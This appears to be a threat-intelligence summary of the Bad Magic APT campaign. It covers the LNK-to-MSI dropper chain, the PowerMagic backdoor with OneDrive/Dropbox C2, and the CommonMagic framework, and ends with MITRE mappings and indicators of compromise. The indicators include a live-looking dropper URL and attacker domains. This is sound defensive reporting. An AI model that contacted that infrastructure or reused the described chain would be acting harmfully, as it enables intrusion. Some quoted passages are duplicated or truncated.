Bad Magic is a Russo-Ukrainian conflict–related APT campaign delivering a modular malware stack starting with a ZIP delivered via a phishing-like lure, then a malicious LNK that leads to an MSI dropper. The operation unfolds as PowerShell-based loaders and a PowerMagic backdoor, with a cloud-based C2 channel using OneDrive/Dropbox, and a follow-on CommonMagic framework for modular tasks. #PowerMagic #CommonMagic #BadMagicAPT #OneDrive #MicrosoftGraphAPI #PowerShell #Msiexec #webservice-srv.online #webservice-srv1.online #185.166.217.184 #Donetsk #Lugansk #Crimea
Keypoints
- Active cyber operations tied to the Russo-Ukrainian conflict have been observed targeting government, agriculture, and transportation sectors in Donetsk, Lugansk, and Crimea.
- The initial compromise likely involved spearphishing or similar methods, leading victims to a ZIP archive hosted on a malicious server containing a decoy document and a double-extension LNK file.
- Opening the LNK in the archive triggers infection via a Windows MSI dropper that downloads and runs a next-stage payload (service_pack.dat) and a decoy document.
- The dropper decrypts the next stage with a multi-step XOR process, executes a PowerShell-based loader, and then cleans up disk artifacts.
- The main PowerMagic backdoor uses a mutex (WinEventCom), runs commands via PowerShell, and communicates with C2 through cloud storage (OneDrive/Dropbox) using the Microsoft Graph API and OAuth tokens.
- A modular framework named CommonMagic is deployed after PowerMagic, featuring multiple executable modules, named pipes, and plugins (e.g., Screenshot and USB data collection) to expand capabilities.
MITRE Techniques
- [T1566.002] Phishing: Spearphishing Link – The victims navigated to a URL pointing to a ZIP archive hosted on a malicious web server. The archive, in turn, contained two files: “The victims navigated to a URL pointing to a ZIP archive hosted on a malicious web server. The archive, in turn, contained two files:”
- [T1204.002] User Execution: Malicious File – a malicious LNK file with a double extension (e.g., .pdf.lnk) that leads to infection when opened. “a malicious LNK file with a double extension (e.g., .pdf.lnk) that leads to infection when opened”
- [T1218.005] Signed Binary Proxy Execution: Msiexec – The MSI file is downloaded and started by the Windows Installer executable. “The MSI file is effectively a dropper package, containing an encrypted next-stage payload (service_pack.dat), a dropper script (runservice_pack.vbs) and a decoy document that is supposed to be displayed to the victim.”
- [T1027] Obfuscated/Encrypted Files and Information – Decryption of service_pack.dat using a multi-step XOR routine before execution. “The decrypted payload is obtained by decrypting service_pack.dat via an XOR-based scheme.”
- [T1059.001] Command and Scripting Interpreter: PowerShell – The dropper’s embedded PowerShell decrypts and runs the next stage. “a wrapper for launching an embedded PowerShell script that decrypts the next stage using a simple one-byte XOR, launches it and deletes it from disk.”
- [T1053.005] Scheduled Task – Creation of a daily Task Scheduler job WindowsActiveXTaskTrigger to execute the VBS launcher. “creates a Task Scheduler job named WindowsActiveXTaskTrigger, to execute the
- [T1071.001] Web Protocols – C2 over cloud storage via OneDrive/Graph API for command and control. “The framework uses OneDrive remote folders as a transport. It utilizes the Microsoft Graph API using an OAuth refresh token embedded into the module binary for authentication.”
- [T1071.004] Web Protocols: Cloud Storage – Data exchange with the operator through cloud services (OneDrive/Dropbox) and RC5Simple-based encryption. “The data exchanged with the operator via the OneDrive location is encrypted using the RC5Simple open-source library.”
Indicators of Compromise
- [Domain] webservice-srv.online, webservice-srv1.online – domains hosting ZIP archives used in the initial delivery
- [IP] 185.166.217.184 – host for the MSI attachment used in the dropper (URL shown in the article)
- [MD5] 0a95a985e6be0918fdb4bfabf0847b5a, ecb7af5771f4fe36a3065dc4d5516d84, and 2 more hashes – MD5 hashes of lure archives
- [File name] attachment.msi, service_pack.dat, manutil.vbs – core artifacts in the PowerMagic dropper and loader chain
- [Mutex] WinEventCom – mutex created by the backdoor
- [URL] http://185.166.217.184/CFVJKXIUPHESRHUSE4FHUREHUIFERAY97A4FXA/attachment.msi, https://content.dropboxapi.com/2/files/upload, https://content.dropboxapi.com/2/files/download – C2 and dropper components
- [Path] %APPDATA%WinEventCom – directory used to store payloads and scripts
Read more: https://securelist.com/bad-magic-apt/109087/